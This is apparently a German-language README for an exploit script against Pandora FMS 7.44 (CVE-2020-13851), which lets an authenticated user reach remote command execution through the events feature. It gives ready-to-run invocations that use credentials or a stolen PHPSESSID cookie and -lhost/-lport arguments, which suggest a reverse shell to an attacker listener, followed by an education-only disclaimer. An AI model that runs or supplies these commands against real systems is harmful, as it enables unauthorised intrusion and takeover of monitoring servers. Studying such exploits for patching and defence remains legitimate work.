
CVE-2020-13851 Pandora FMS 7.44
Pandora FMS 7.44 CVE-2020-13851 RCE ermöglicht es einem authentifizierten Benutzer, über die Ereignisfunktion eine entfernte Befehlsausführung zu erreichen. Dies kann mit Anmeldedaten oder einem PHP-Sitzungs-Cookie durchgeführt werden.
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -u username -p password -lhost 127.0.0.1 -lport 1337
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -c PHPSESSID -lhost 127.0.0.1 -lport 1337
Hilfemenü
python3 pandorafms_7.44.py -h
Der gesamte auf diesem Repository bereitgestellte Code dient ausschließlich zu Bildungs- und Forschungszwecken. Jegliche Handlungen und/oder Aktivitäten im Zusammenhang mit dem in diesem Repository enthaltenen Material liegen in Ihrer alleinigen Verantwortung. Der Missbrauch des Codes in diesem Repository kann zu strafrechtlichen Verfolgungen gegen die betreffenden Personen führen. Der Autor wird nicht für den Fall haftbar gemacht, dass gegen Personen, die den Code in diesem Repository missbrauchen, um gegen das Gesetz zu verstoßen, strafrechtliche Anklagen erhoben werden.